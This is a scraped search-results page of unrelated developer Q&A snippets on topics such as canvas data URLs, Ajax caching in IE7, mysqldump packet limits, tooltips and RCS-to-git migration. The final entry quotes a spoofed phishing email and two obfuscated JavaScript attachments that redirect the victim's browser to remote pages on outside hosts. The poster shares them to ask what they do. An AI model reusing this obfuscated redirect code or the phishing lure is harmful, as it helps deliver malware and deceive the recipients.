Search Results

Search found 17194 results on 688 pages for 'document databases'.

Page 278/688 | < Previous Page | 274 275 276 277 278 279 280 281 282 283 284 285  | Next Page >

  • Can I use Data URLs in Android 2.1's Webkit-based browser?

    - by Sven Haiges
    Hi all, I am writing a tutorial about the HTML5 Canvas for mobile and did some basic tests. While I can call the getDataURL() Method on an iPhone's HTML5 Canvas Element, it does not seem to return the data URL on Android 2.1 (Google Nexus One) and it's webkit-based default browser. Here is the sample: var dataURL = canvas.toDataURL(); var img = document.createElement('img'); img.setAttribute('src', dataURL); document.getElementById('box').appendChild(img); This will work on iPhone, it will add a new image element with the same content as the canvas. It does nothing or fails on Android 2.1. Has anyone ever gotten this to work? I am also wondering if anyone could help me with understanding the WebKit Build numbers and what it means with regards to what features I can expect. For the iphone, I see a build number of 528.18, on Android 2.1's Browser I see (from the user agent strign) a WebKit build 530.17. So it looks Android 2.1's webkit browser is more up to date, still some features work on iPhone's webkit but not on Android. Does this comparison just make no sense? Thanx all!

    Read the article

  • Prototype's Ajax.Updater not actually updating on IE7.

    - by Ben S
    I am trying to submit a form using Ajax.Updater and have the result of that update a div element in my page. Everything works great in IE6, FF3, Chrome and Opera. However, In IE7 it sporadically works, but more often than not, it just doesn't seem to do anything. Here's the javascript: function testcaseHistoryUpdate(testcase, form) { document.body.style.cursor = 'wait'; var param = Form.serialize(form); new Ajax.Updater("content", "results/testcaseHistory/" + testcase, { onComplete: function(transport) {document.body.style.cursor = 'auto'}, parameters: param, method: 'post' } ); } I've verified using alert() calls that param is set to what I expect. I've read in many places that IE7 caches aggressively and that it might be the root cause, however every after adding the following to my php response, it still doesn't work. header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT"); header("Cache-Control: no-store, no-cache, must-revalidate"); header("Cache-Control: post-check=0, pre-check=0", false); header("Pragma: no-cache"); To further try to fix a caching issue I've tried adding a bogus parameter which just gets filled with a random value to have different parameters for every call, but that didn't help. I've also found this, where UTF-8 seemed to be causing an issue with IE7, but my page is clearly marked: <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> Does anyone have any idea what could be wrong with IE7 as opposed to the other browsers I tested to cause this kind of issue?

    Read the article

  • Error 2020: Got packet bigger than 'max_allowed_packet' bytes when dumping table

    - by Imagineer
    I'm getting the above mentioned error when backing up with ZRM, which is using mysqldump for backup. mysqldump --opt --extended-insert --single-transaction --create-options --default-character-set=utf8 --user=" " -p --all-databases "/nfs/backup/mysql01/dailyrun/20091216043001/backup.sql" mysqldump: Error 2020: Got packet bigger than 'max_allowed_packet' bytes when dumping table TICKET_ATTACHMENT at row: 2286 I have increased the size for 'max_allowed_packet' to be 1G in /etc/my.cnf which is the server setting and for the client side setting I've set it by running this command: mysql -u -p --max_allowed_packet=1G And I have verified that on the client and server side they are of the same value. This is to check the client side value according to this forum posting http://forums.mysql.com/read.php?35,75794,261640 mysql SELECT @@MAX_ALLOWED_PACKET - ; +----------------------+ | @@MAX_ALLOWED_PACKET | +----------------------+ | 1073741824 | +----------------------+ 1 row in set (0.00 sec) And this is the check the server value setting. mysql SHOW VARIABLES | max_allowed_packet | 1073741824 | I have ran out of ideas, and tried searching within expert exchange and googling for solutions but so far none has worked. Reference http://dev.mysql.com/doc/refman/5.1/en/packet-too-large.html Anyone please advise, thank you.

    Read the article

  • JQuery Tool tips

    - by kwek-kwek
    I want to create a tool tip for an image with a link now I had it working one but it doesn't work with the 2nd image. Here is my Sample Code: <!-- trigger element. a regular workable link --> <a id="test" title="Name - Title">Name</a> <!-- tooltip element --> <div class="tooltip"> <div><span class="name">Name</span><br /> Title <span><a href="#">more info»</a></span></div> </div> <!-- trigger element. a regular workable link --> <a id="test2" title="Name - Title">Name</a> <!-- tooltip element --> <div class="tooltip2"> <div><span class="name">Name</span><br /> Title <span><a href="#">more info»</a></span></div> </div> and here is my script that makes it all happens: <script> // What is $(document).ready ? See: http://flowplayer.org/tools/using.html#document_ready $(document).ready(function() { // enable tooltip for "test" element. use the "slide" effect $("#test").tooltip({ effect: 'slide', offset: [50, 40] }); $("#test2").tooltip2({ effect: 'slide', offset: [50, 40] }); }); </script> but not working please help.

    Read the article

  • Dynamically created iframe used to download file triggers onload with firebug but not without

    - by justkt
    EDIT: as this problem is now "solved" to the point of working, I am looking to have the information on why. For the fix, see my comment below. I have an web application which repeatedly downloads wav files dynamically (after a timeout or as instructed by the user) into an iframe in order to trigger the a default audio player to play them. The application targets only FF 2 or 3. In order to determine when the file is downloaded completely, I am hoping to use the window.onload handler for the iframe. Based on this stackoverflow.com answer I am creating a new iframe each time. As long as firebug is enabled on the browser using the application, everything works great. Without firebug, the onload never fires. The version of firebug is 1.3.1, while I've tested Firefox 2.0.0.19 and 3.0.7. Any ideas how I can get the onload from the iframe to reliably trigger when the wav file has downloaded? Or is there another way to signal the completion of the download? Here's the pertinent code: HTML (hidden's only attribute is display:none;): <div id="audioContainer" class="hidden"> </div> JavaScript (could also use jQuery, but innerHTML is faster than html() from what I've read): waitingForFile = true; // (declared at the beginning of closure) $("#loading").removeClass("hidden"); var content = "<iframe id='audioPlayer' name='audioPlayer' src='" + /path/to/file.wav + "' onload='notifyLoaded()'></iframe>"; document.getElementById("audioContainer").innerHTML = content; And the content of notifyLoaded: function notifyLoaded() { waitingForFile = false; // (declared at beginning of the closure) $("#loading").addClass("hidden"); } I have also tried creating the iframe via document.createElement, but I found the same behavior. The onload triggered each time with firebug enabled and never without it. EDIT: Fixed the information on how the iframe is being declared and added the callback function code. No, no console.log calls here.

    Read the article

  • How to migrate project from RCS to git? (SOLVED)

    - by Norman Ramsey
    I have a 20-year-old project that I would like to migrate from RCS to git, without losing the history. All web pages suggest that the One True Path is through CVS. But after an hour of Googling and trying different scripts, I have yet to find anything that successfully converts my RCS project tree to CVS. I'm hoping the good people at Stackoverflow will know what actually works, as opposed to what is claimed to work and doesn't. (I searched Stackoverflow using both the native SO search and a Google search, but if there's a helpful answer in the database, I missed it.) UPDATE: The rcs-fast-export tool at http://git.oblomov.eu/rcs-fast-export was repaired on 14 April 2009, and this version seems to work for me. This tool converts straight to git with no intermediate CVS. Thanks Giuseppe and Jakub!!! Things that did not work that I still remember: The rcs-to-cvs script that ships in the contrib directory of the CVS sources The rcs-fast-export tool at http://git.oblomov.eu/rcs-fast-export in versions before 13 April 2010 The rcs2cvs script found in a document called "CVS-RCS- HOW-TO Document for Linux"

    Read the article

  • XML generation with java, trying to copy the whole node

    - by Pawel Mysior
    I've got an xml document that filled with people (parent node is "students", and there are 25+ "student" nodes). Each student looks like this: <student> <name></name> <surname></surname> <grades> <subject name=""> <small_grades></small_grades> <final_grade></final_grade> </subject> <subject name=""> <small_grades></small_grades> <final_grade></final_grade> </subject> </grades> <average></average> </student> Basically, what I want to do ('ve been asked to do) is to make a program that would get 3 students with the best average. While parsing the document and getting three best students isn't too difficult, the XML generation is a pain in the ass. Right now, what I'm doing is getting every single node from student and recreating it to a new file. Is there a way to copy the whole student node with everything that's in it? Regards, Paul

    Read the article

  • What can cause SQL 2008 Transaction Log Shipping to stop functioning?

    - by Rick
    I read somewhere that doing a backup or when Maintenance Plan runs can cause Log Shipping to stop functioning. Is this true? What should we watch out for once our Transaction Log Shipping is in place that could stop it? A Log Shipping test we were doing between two databases on the same SQL 2008 server appeared to stop working without any error. When we checked the History of the LSRestore_* job it was always ignoring the new *.trn files. Any suggestions? Thanks.

    Read the article

  • sql and web encoding problem

    - by Marki
    Guys, I've got an encoding problem I believe. I have upgraded from phpBB2 to phpBB3. The old databases were in latin1, the new ones have utf8 encoding. Already during the upgrade process some rows of the DB were only read partly into the new version, because of strange characters as it turned out. When I use PHP's mb_convert_encoding() function to convert those strings to UTF8 they end up e.g. as 0x0093, i.e. they must have been some kind of double quotes. Even after doing this conversion, they still show up as 0x0093 in the browser (the squares with 0093 in them when the browser does not know what to display). Can someone explain the problem here? I'm a little confused and afraid I don't see all the dependencies that need to work to have the correct encodings and the correct display thereof...

    Read the article

  • How to edit CSV file without changing or formatting values (ideally in Neo/Open-Office)?

    - by Scott Saunders
    I often need to edit CSV files that will later be imported into databases. I need to reorder columns, change values, delete lines, etc. I use NeoOffice for this now - it's basically Open Office with some Mac UI stuff tweaked. Often, though NeoOffice tries to be "helpful" and reformats fields it thinks are dates, rounds numbers to some number of decimals, etc. This breaks the file import and/or changes important data values. How can I prevent this from happening? I need to edit the fields exactly as they would appear in a text editor, with absolutely no changes to the data in the fields.

    Read the article

  • Investigating the root cause behind SharePoint's "request not found in the TrackedRequests"

    - by Muhimbi
    We have a long standing issue in our bug tracking system about the dreaded "ERROR: request not found in the TrackedRequests. We might be creating and closing webs on different threads." message in SharePoint's trace log. As we develop Workflow software for the SharePoint market, we look into this issue from time to time to make sure it is not caused by our products. I have personally come to the conclusion that this is a problem in SharePoint, but perhaps someone else can prove me wrong. Here is what I know: According to the hundreds of search results returned by Google on this topic, this issue appears to be mainly related to SharePoint Workflows, both SharePoint Designer and Visual Studio based workflows. Assuming ULS logging is set to Monitorable, the easiest way to reproduce this problem is to create a new SharePoint Designer Workflow, attach it to a document library, set it to auto start on add/update, don't add any actions, save the workflow and upload a file to the document library. The error is only visible in the SharePoint trace log, it does not appear to impact the execution of the workflow at hand. I have verified that the problem occurs on 32 bit as well as 64 bit systems, Win2K3 and 2K8, WSS and MOSS with SharePoint versions up to the December 2009 Cumulative Update (6524). The problem does not occur when a workflow is started manually. There are dozens of related posts on MSDN Forums, hundreds on Google, one on StackOverflow and none on SharePoint Overflow. There appears to be no answer. Does anyone have any idea about what is going on, what is causing this and if we should worry or file this under 'Red Herrings'.

    Read the article

  • Latex renewcommand not working properly

    - by Nazgulled
    Why is this not working: \documentclass[a4paper,10pt]{article} \usepackage{a4wide} \usepackage[T1]{fontenc} \usepackage[portuguese]{babel} \usepackage[latin1]{inputenc} \usepackage{indentfirst} \usepackage{listings} \usepackage{fancyhdr} \usepackage{url} \usepackage[compat2,a4paper,left=25mm,right=25mm,bottom=15mm,top=20mm]{geometry} \usepackage{color} \usepackage[colorlinks]{hyperref} \usepackage[pdftex]{graphicx} \renewcommand{\headrulewidth}{0.4pt} \renewcommand{\footrulewidth}{0.4pt} \pagestyle{fancy} \fancyhead[L]{\small Laboratórios de Informática III} \fancyhead[R]{\small Projecto 1 (Linguagem \textsf{C})} \lstset{ basicstyle=\ttfamily\footnotesize, showstringspaces=false, frame=single, tabsize=4, breaklines=true, } \definecolor{Section1}{rgb}{0.09,0.21,0.36} \definecolor{Section2}{rgb}{0.21,0.37,0.56} \definecolor{Section3}{rgb}{0.30,0.50,0.74} \hypersetup{ bookmarks=false, linkcolor=red, urlcolor=cyan, } \renewcommand{\section}[1]{\texorpdfstring{\color{green}#1}{#1}} \parskip=6pt \begin{document} \begin{titlepage} \begin{center} \includegraphics[width=5cm]{./logo.jpg}\\[1cm] \textsc{\LARGE Universidade do Minho}\\[1cm] \textsc{\large Licenciatura em Engenharia Informática\\Laboratórios de Informática III}\\[1.5cm] \rule{\linewidth}{0.5mm}\\[0.4cm] \huge{\textbf{\textsc{Relatório do Projecto 1 (Linguagem C)}}} \rule{\linewidth}{0.5mm} \vfill \begin{tabular}{c c} \includegraphics[width=3.5cm]{./nuno.jpg} & \includegraphics[width=3.5cm]{./ricardo.jpg} \\ \textsc{\large{Nuno Mendes (51161)}} & \textsc{\large{Ricardo Amaral (48404)}} \\ \end{tabular} \vfill \large{\today} \end{center} \end{titlepage} \tableofcontents \newpage \section{Introdução} Lorem ipsum... \newpage \appendix \section{\color{Section1}Diagrama das Estruturas de Dados} \begin{center} \includegraphics[width=16cm]{./Diagrama.pdf} \end{center} \end{document} ! LaTeX Error: Something's wrong--perhaps a missing \item. See the LaTeX manual or LaTeX Companion for explanation. Type H for immediate help. ... l.2 ...rline {1}\color {green}Teste}{3}{section.1} How can I make it work properly?

    Read the article

  • ActiveRecord table inheritence using set_table_names

    - by Jinyoung Kim
    Hi, I'm using ActiveRecord in Ruby on Rails. I have a table named documents(Document class) and I want to have another table data_documents(DataDocument) class which is effectively the same except for having different table name. In other words, I want two tables with the same behavior except for table name. class DataDocument < Document #set_table_name "data_documents" self.table_name = "data_documents" end My solution was to use class inheritance as above, yet this resulted in inconsistent SQL statement for create operation where there are both 'documents' table and 'data_documents' table. Can you figure out why and how I can make it work? >> DataDocument.create(:did=>"dd") ActiveRecord::StatementInvalid: Mysql::Error: Unknown column 'data_documents.did' in 'where clause': SELECT `documents`.id FROM `documents` WHERE (`data_documents`.`did` = BINARY 'dd') LIMIT 1 from /Users/lifidea/.gem/ruby/1.8/gems/activerecord-2.3.2/lib/active_record/connection_adapters/abstract_adapter.rb:212:in `log' from /Users/lifidea/.gem/ruby/1.8/gems/activerecord-2.3.2/lib/active_record/connection_adapters/mysql_adapter.rb:320:in `execute' from /Users/lifidea/.gem/ruby/1.8/gems/activerecord-2.3.2/lib/active_record/connection_adapters/mysql_adapter.rb:595:in `select' from /Users/lifidea/.gem/ruby/1.8/gems/activerecord-2.3.2/lib/active_record/connection_adapters/abstract/database_statements.rb:7:in `select_all_without_query_cache' from /Users/lifidea/.gem/ruby/1.8/gems/activerecord-2.3.2/lib/active_record/connection_adapters/abstract/query_cache.rb:62:in `select_all'

    Read the article

  • Concatenate javascript to a string/parameter in a function

    - by Gerry S
    I am using kottke.org's old JAH example to return some html to a div in a webpage. The code works fine if I use static text. However I need to get the value of a field to add to the string that is getting passed as the parameter to the function. var xmlhttp=false; /*@cc_on @*/ /*@if (@_jscript_version >= 5) try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); } catch (E) { xmlhttp = false; } } @end @*/ if (!xmlhttp && typeof XMLHttpRequest != 'undefined') { xmlhttp = new XMLHttpRequest(); } function getMyHTML(serverPage, objID) { var obj = document.getElementById(objID); xmlhttp.open("GET", serverPage); xmlhttp.onreadystatechange = function() { if (xmlhttp.readyState == 4 && xmlhttp.status == 200) { obj.innerHTML = xmlhttp.responseText; } } xmlhttp.send(null); } And on the page.... <a href="javascript://" onclick="getMyHTML('/WStepsDE?open&category="+document.getElementById('Employee').value;+"','goeshere')">Change it!</a></p> <div id ="goeshere">Hey, this text will be replaced.</div> It fails (with the help of Firebug) with the getMyHTML call where I try to get the value of Employee to include in the first parameter. The error is "Unterminated string literal". Thx in advance for your help.

    Read the article

  • Cloud Computing - Multiple Physical Computers, One Logical Computer

    - by bundini
    I know that you can set up multiple virtual machines per physical computer. I'm wondering if it's possible to make multiple physical computers behave as one logical unit? Fundamentally the way I imagine it working is that you can throw 10 computers into a facility one day. You've got one client that requires the equivalent of two computers worth, and 100 others that eat up the remaining 8. As demands change you're just reallocating logical resources, maybe the 2 computer client now requires a third physical system. You just add it to the cloud, and don't worry about sharding the database, or migrating data over to a new server. Can it work this way? If yes, why would anyone ever do things like hand partition their database servers anymore? Just add more computing resources. You scale horizontally with the hardware, but your server appears to scale vertically. There's no need to modify your application's supporting infrastructure to support multiple databases etc.

    Read the article

  • Cloud Computing - Multiple Physical Computers, One Logical Computer

    - by Koobz
    I know that you can set up multiple virtual machines per physical computer. I'm wondering if it's possible to make multiple physical computers behave as one logical unit? Fundamentally the way I imagine it working is that you can throw 10 computers into a facility one day. You've got one client that requires the equivalent of two computers worth, and 100 others that eat up the remaining 8. As demands change you're just reallocating logical resources, maybe the 2 computer client now requires a third physical system. You just add it to the cloud, and don't worry about sharding the database, or migrating data over to a new server. Can it work this way? If yes, why would anyone ever do things like partition their database servers anymore? Just add more computing resources. You scale horizontally with the hardware, but your server appears to scale vertically. There's no need to modify your application's infrastructure to support multiple databases etc.

    Read the article

  • MySQL Linked Server and SQL Server 2008 Express Performance

    - by Jeffrey
    Hi All, I am currently trying to setup a MySQL Linked Server via SQL Server 2008 Express. I have tried two methods, creating a DSN using the mySQL 5.1 ODBC driver, and using Cherry Software OLE DB Driver as well. The method that I prefer would be using the ODBC driver, but both run horrendously slow (doing one simple join takes about 5 min). Is there any way I can get better performance? We are trying to cross query between multiple mySQL databases on different servers, and this seems to be method we think would work well. Any comments, suggestions, etc... would be greatly appreciated. Regards, Jeffrey

    Read the article

  • "User Friendly" .net compatible Regex/Text matching tools?

    - by Binary Worrier
    Currently in our software we provide a hook where we call a DLL built by our clients to parse information out of documents we are processing (the DLL takes in some text (or a file) and returns a list of name/value pairs). e.g. We're given a Word doc or Text file to Archive. We do various things to the file, and call a DLL that will return "pertinent" information about the file. Among other things we store that "pertinent" data for posterity. What is considered "pertinent" depends on the client and the type of the document, we don't care, we get it and store it. I've been asked to develop a user friendly "something" that will allow a non-programmer user to "configure" how to get this data from a plain text document (<humor>The user story ends with the helpful suggestion/query "We could use regex for this?"</humor>) It's safe to assume that a list of regex's isn't going to cut this, I've written some of these parsers for customers, the regex's to do these would be hedious and some of them can't be done by regex's. Also one of the requirements above is "user friendly" which negates anything that has users seeing or editing regex expressions. As you can guess, I don't have a fortune of time to do this, and am wondering is there anything out there that I can plug in to our app that has a nice front end and does exactly what I need? :) No? Whadda mean no! . . . sigh Ok then failing that, anything out there that "visually" builds regex's and/or other pattern matching expressions, and then allows one to run those expressions against some text? The MS BRE will do what I want, but I need something prettier that looks less like code. Thanks guys,

    Read the article

  • Dashcode code translation

    - by Alex Mcp
    Hi, a quick, probably easy question whose answer is probably "best practice" I'm following a tutorial for a custom-template mobile Safari webapp, and to change views around this code is used: function btnSave_ClickHandler(event) { var views = document.getElementById('stackLayout'); var front = document.getElementById('mainScreen'); if (views && views.object && front) { views.object.setCurrentView(front, true); } } My question is just about the if conditional statement. What is this triplet saying, and why do each of those things need to be verified before the view can be changed? Does views.object just test to see if the views variable responds to the object method? Why is this important? EDIT - This is/was the main point of this question, and it regards not Javascript as a language and how if loops work, but rather WHY these 3 things specifically need to be checked: Under what scenarios might views and front not exist? I don't typically write my code so redundantly. If the name of my MySQL table isn't changing, I'll just say UPDATE 'mytable' WHERE... instead of the much more verbose (and in my view, redundant) $mytable = "TheSQLTableName"; if ($mytable == an actual table && $mytable exists && entries can be updated){ UPDATE $mytable; } Whereas if the table's name (or in the JS example, the view's names) ARE NOT "hard coded" but are instead a user input or otherwise mutable, I might right my code as the DashCode example has it. So tell me, can these values "go wrong" anyhow? Thanks!

    Read the article

  • Slight network lag on Small Business Server 2008 R2

    - by Sir.Nathan Stassen
    I recently upgraded a network from a SBS 2003 server to a SBS 2008 R2 Server. Both I and users have noticed a slight delay in network applications and browsing network drives on the new server. It is minor, maybe a second or two at most. However I am wondering if anyone knows of anyway to optimize the networking to service requests sooner to the workstations. The network is running a 1 gig network with some 100 meg devices (mainly network printers). All workstations are XP SP3 Network software runs out of a shared folder mapped as a network drive, no sql databases. Server is a Dell Poweredge T610 with plenty of ram, cpu power, and storage.

    Read the article

  • Can pdflatex (or any tex package) automatically rescale included images which have been reduced in s

    - by drfrogsplat
    I'm writing my thesis in LaTeX, generating it with pdflatex. I have a large number of figures, many of which are bitmaps (as opposed to SVG) in PNG/JPEG format. I've generally created them to be fairly high resolution (say 1600x1200-ish) to ensure that whatever size they end up in the document, they'll be at least 300dpi when printed. As I'm writing/laying out the document, I'm including graphics (using \includegraphics from the graphicx package) and setting widths/heights as appropriate (e.g. subfigures are quite small). I don't need the images to be any more than about 300 dpi at best, so where I have shrunk a 1600x1200 image down to say 5cm, the image is now at 800 dpi. So despite including some very small (on the page) images, the PDF is becoming quite large. Is there a way to tell pdflatex or graphicx (or something else involved?) to convert all images to a maximum of 300 dpi, based on the dimensions I'm setting with say \includegraphics[width=2in]{filename}? i.e. so it scales the image to a max of 600x600 pixels as it includes it in the PDF (leaving the original file untouched). I know I can resize the original images with various command line applications, and include the pre-resized versions, but given the images vary in size considerably, it wouldn't be as simple as making sure they're all 300dpi for a constant printed size. It'd also be nice to be able to easily create different versions of PDFs (web vs final print) without resizing images manually, so that the 'web' PDF capped images at say 72-100 dpi while the final print one could cap at 600 (if at all).

    Read the article

  • Problems with registering click event listener to a frame-element

    - by distractedBySquirrels
    Hi everybody, I ran into a problem with adding an event listener. I wrote a Firefox plugin a while ago for my bachelor thesis. It was based on a different attacker model than you would normally expect. In this scenario the attacker was the service provider (like Facebook, Google,...), who reads all your private data stored on their site (via JS). My final solution was to temporally allow JS (while the page loads and after an user action occured). To observe the interaction I used event listener, which worked very well so far. But last week I noticed that my approach doesn't work with web sites which are using a frameset (I added the event listener to the body...). So I tried to add the listener to the frameset respectively to the frame. But the clicks are only noticed when you actually click on the frame... (eg resize the frame with your mouse) But I want to register clicks on the document loaded inside the frame. I already tried the .frameElement. Sadly it seems that Firefox doesn't like my (or, which is more likely, I'm too stuipd :) ) and claims there are no frames... Could anyone tell me how to add an event listener to the document inside a frame? The web site looks like this: <html> <head> <title>Frameset Test</title> </head> <frameset cols="150,*"> <frame src="nav.html" name="Navigation"> <frame src="main.html" name="Main"> </frameset> </html> This was my first bigger projekt with Mozilla so this could be a really dumb failure of mine... I hope you guys can help me. Thanks in advance. Sebastian

    Read the article

  • Bloated PDF created by TCPDF

    - by Yogi Yang 007
    In a web app developed in PHP we are generating Quotations and Invoices (which are very simple and of single page) using TCPDF lib. The lib is working just great but it seems to generate very large PDF files. For example in our case it is generating PDF files as large as 4 MB (+/- a few KB). How to reduce this bloating of PDF files generated by TCPDF? Here is code snippet that I am using ob_start(); include('quote_view_bag_pdf.php'); //This file is valid HTML file with PHP code to insert data from DB $quote = ob_get_contents(); //Capture the content of 'quote_view_bag_pdf.php' file and store in variable ob_end_clean(); //Code to generate PDF file for this Quote //This line is to fix a few errors in tcpdf $k_path_url=''; require_once('tcpdf/config/lang/eng.php'); require_once('tcpdf/tcpdf.php'); // create new PDF document $pdf = new TCPDF(); // remove default header/footer $pdf->setPrintHeader(false); $pdf->setPrintFooter(false); // add a page $pdf->AddPage(); // print html formated text $pdf->writeHtml($quote, true, 0, true, 0); //Insert Variables contents here. //Build Out File Name $pdf_out_file = "pdf/Quote_".$_POST['quote_id']."_.pdf"; //Close and output PDF document $pdf->Output($pdf_out_file, 'F'); $pdf->Output($pdf_out_file, 'I'); /////////////// enter code here Hope this code fragment will give some idea?

    Read the article

  • Ecommerce Database DNS Switch

    - by KThompson
    Hello, I am moving an e-commerce site to a new server. All has been successful and its time to change the DNS for the domain. It's a relatively popular site and I fear that during propagation orders will be split between the old database and the new one. The databases do contain content that is dependent of the server it is on (Cache path, upload directory, etc.) so I can't just point the old site to the new database. Are there any solutions to this without any of the sites going down. Thanks in advance

    Read the article

  • What does this Javascript do?

    - by nute
    I've just found out that a spammer is sending email from our domain name, pretending to be us, saying: Dear Customer, This e-mail was send by ourwebsite.com to notify you that we have temporanly prevented access to your account. We have reasons to beleive that your account may have been accessed by someone else. Please run attached file and Follow instructions. (C) ourwebsite.com (I changed that) The attached file is an HTML file that has the following javascript: <script type='text/javascript'>function mD(){};this.aB=43719;mD.prototype = {i : function() {var w=new Date();this.j='';var x=function(){};var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};xO=false;var b=new mD(); yY="";b.i();this.xT='';</script> Another email had this: <script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script> Can anyone tells me what it does? So we can see if we have a vulnerability, and if we need to tell our customers about it ... Thanks

    Read the article

< Previous Page | 274 275 276 277 278 279 280 281 282 283 284 285  | Next Page >